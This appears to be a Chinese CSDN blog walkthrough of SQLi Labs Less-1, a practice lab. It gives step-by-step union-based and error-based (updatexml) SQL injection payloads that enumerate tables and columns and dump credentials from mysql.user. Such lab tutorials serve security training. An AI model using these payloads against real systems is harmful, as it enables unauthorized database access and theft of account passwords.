SQLi Labs Less-1 联合注入+报错注入

本文详细介绍了SQL注入中的两种常见技术——联合注入和报错注入,通过实际操作步骤展示了如何利用这两种方法进行数据库的探测与脱库。首先,通过测试确定注入点和字段数,然后逐步揭示数据库中的表名、字段名以及敏感信息,如账号密码。对于无法直接获取信息的情况,使用报错注入来触发数据库错误并提取数据。
摘要由CSDN通过智能技术生成

「作者简介」:冬奥会网络安全中国代表队,CSDN Top100,就职奇安信多年,以实战工作为基础著作 《网络安全自学教程》,适合基础薄弱的同学系统化的学习网络安全,用最短的时间掌握最核心的技术。

第一关是单引号字符型注入,推荐使用联合注入、报错注入

方式一:联合注入

参考文章:联合注入使用详解,原理+步骤+实战案例

第一步、判断注入点

地址栏输入:?id=1' and 1 -- a,正常显示

 地址栏输入:?id=1' and 0 -- a,异常(空)显示,确定注入点为:单引号字符型

 第二步、判断字段数

地址栏依次输入:

?id=1' order by 1 -- a

?id=1' order by 2 -- a

?id=1' order by 3 -- a

?id=1' order by 4 -- a,开始报错,确定字段数为:3

 第三步、判断显示位

地址栏输入:?id=0' union select 1,2,3 -- a

 第四步、脱库

获取所有表:

?id=0' union select 1,(select group_concat(table_name) from information_schema.tables where table_schema=database()),3 -- a

 获取所有字段:

?id=0' union select 1,(select group_concat(column_name) from information_schema.columns where table_schema=database() and table_name='users'),3 -- a

 获取账号密码:

?id=0' union select 1,(select group_concat(host,user,password) from mysql.user),3 -- a

方式二:报错注入

参考文章:报错注入使用详解,原理+步骤+实战教程

第一步、判断是否报错

地址栏输入:?id=1'

页面显示数据库的报错信息,适合使用报错注入。

第二步、验证报错函数

地址栏输入:?id=1' and updatexml(1,0x7e,3); -- a

页面正常报错,报错函数可以正常使用。

第三步、脱库

获取当前数据库:

?id=-1' and updatexml(1,concat('~',database()),3) -- a

 获取所有表:

?id=-1' and updatexml(1,concat('~',
    substr((select group_concat(table_name)
    from information_schema.tables where table_schema=database()) , 1 , 31)
),3) -- a

 获取账号密码:

?id=-1' and updatexml(1,concat('~',
    substr((select password 
    from mysql.user where user='mituan') , 1 , 31)
),3) -- a

  • 9
    点赞
  • 4
    收藏
    觉得还不错? 一键收藏
  • 打赏
    打赏
  • 0
    评论
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包

打赏作者

士别三日wyx

你的鼓励将是我创作的最大动力

¥1 ¥2 ¥4 ¥6 ¥10 ¥20
扫码支付:¥1
获取中
扫码支付

您的余额不足,请更换扫码支付或充值

打赏作者

实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值